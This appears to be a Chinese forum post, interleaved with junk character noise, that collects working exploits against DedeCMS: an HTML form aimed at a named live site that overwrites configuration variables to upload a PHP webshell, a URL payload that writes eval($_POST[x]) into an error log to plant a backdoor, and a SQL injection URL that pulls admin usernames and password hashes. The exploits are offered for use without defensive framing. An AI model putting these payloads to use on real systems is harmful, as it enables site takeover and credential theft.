* X# ^* j; `" z+ |3 T7 P6 U7 H. H/ u
' X6 _  y: p. U
- w% N( K0 w# ]/ m8 g1 w
) ]% a: j! D% Z
8 s7 V' Q+ I- p  W织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
3 l: o8 q6 e/ e$ G, P<html>- E- t$ `  y& n' x3 [
<head>
8 t6 V' c+ U' K( ^( f4 e9 S9 T# T<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
/ {) N! Y) {( [& @/ H</head>8 f* i  G" \! a% q: U. h; {! u
<body style="FONT-SIZE: 9pt">
( O  H# C2 l( j( E, z4 x---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />+ U: q6 E/ B6 m3 n( X
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>& B5 X. _: j: d/ i$ K
<input type='hidden' name='activepath' value='/data/cache/' />* {5 t7 e  X; \1 }
<input type='hidden' name='cfg_basedir' value='../../' />- a2 m8 I( v* p; y& k
<input type='hidden' name='cfg_imgtype' value='php' />
9 G, U1 D0 R  y8 T<input type='hidden' name='cfg_not_allowall' value='txt' />
* [  y( h$ I  S<input type='hidden' name='cfg_softtype' value='php' />7 N0 L0 D; [& b4 \5 i
<input type='hidden' name='cfg_mediatype' value='php' />3 a8 k. N8 H; z8 Q& m! e
<input type='hidden' name='f' value='form1.enclosure' />
3 A) N5 x& M0 `5 a<input type='hidden' name='job' value='upload' />
! A9 ^3 m5 L  ^  l3 D1 T9 k2 t! @2 \<input type='hidden' name='newname' value='fly.php' />( M9 F/ H( i" ~  K  U  P# x
Select U Shell <input type='file' name='uploadfile' size='25' />
; c8 n( r  d8 o" }' n3 |0 b7 e" M  [<input type='submit' name='sb1' value='确定' />
6 M8 I" D) q% K' v$ D" ~& H9 ?</form>
) H8 Z" |' C! p3 b<br />It's just a exp for the bug of Dedecms V55...<br />
4 ^6 f: _' w; {- X$ `4 ?9 PNeed register_globals = on...<br />& R- V7 Q8 A9 v- K) H- Q
Fun the game,get a webshell at /data/cache/fly.php...<br />, U" x8 K; v; G* I6 _% `9 W6 p$ b
</body>4 @! ?9 g4 M; R
</html>
/ S  ~# p- }6 g( H$ g1 g6 c: O# ~, b, C; ^
; X4 H/ F. ~1 V1 `# m; X! |

! C9 i: _" A! \' Y0 g6 r! `* j: s% B) W

8 S, y0 A: U' E' }+ `9 ~- z& Y7 {' M# R* K5 y
- x5 _& f! X, I$ ~
. x" b, o7 V/ R
/ b" i5 x* m* ]  p
6 |9 @+ `; {2 m. n! |( w# f
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞( h% F7 u' [. q+ g
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
" w1 d! ~0 w7 t/ t1 E5 r1. 访问网址:8 ?- P9 L. a' l  f4 y; m$ ?+ O
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>- k( p. m! m# d& u! k8 s( O% Y" A
可看见错误信息
: i8 ]- C: x) D+ z4 _4 |2 @& w7 D2 V% i( b1 J3 A

4 d1 L5 T. T$ Q, u2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。; }+ g$ v8 a+ S/ {
int(3) Error: Illegal double '1024e1024' value found during parsing5 g6 E3 m1 W/ F) E( P
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
$ l' Z0 P+ y% K* l# T3 P
- I! w7 d5 T/ V0 p; P! c; A( D8 W% y- Q6 l
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
  b9 ?- ~) \9 ?7 ?4 M* B
, Z- B3 ?1 f: T( z7 @! L9 Z: ?) F5 M5 N# Q( X
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>4 }/ Z; F7 y( i. s

& }3 Q" n1 ^0 F/ R
& t! J$ Z- k( \; w+ Z( @6 ]按确定后的看到第2步骤的信息表示文件木马上传成功.+ s1 i- D8 H4 u+ Q2 t  K1 P
( {$ X+ E: s+ x( ~5 U9 g
! A, N1 G& p' W/ r- m2 P0 M

  @4 u( K3 o- X1 i' p: y: T' h4 G+ b
! j0 l  d# k! T# \! B
1 G& l$ j+ j; P: U
6 E% P' M+ K8 i8 R2 F. a$ _
. H& h& H' {4 U" }& T0 v7 P8 M
+ L: h& l7 O% z( l4 P2 ~/ Z/ y

  N6 s. I! O5 U7 O. Q1 O
& T$ K2 h% {; w5 A1 R) c6 O
/ h: m) Y3 t5 X! W' J织梦(DedeCms)plus/infosearch.php 文件注入漏洞" c3 I7 q5 @" V) c
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表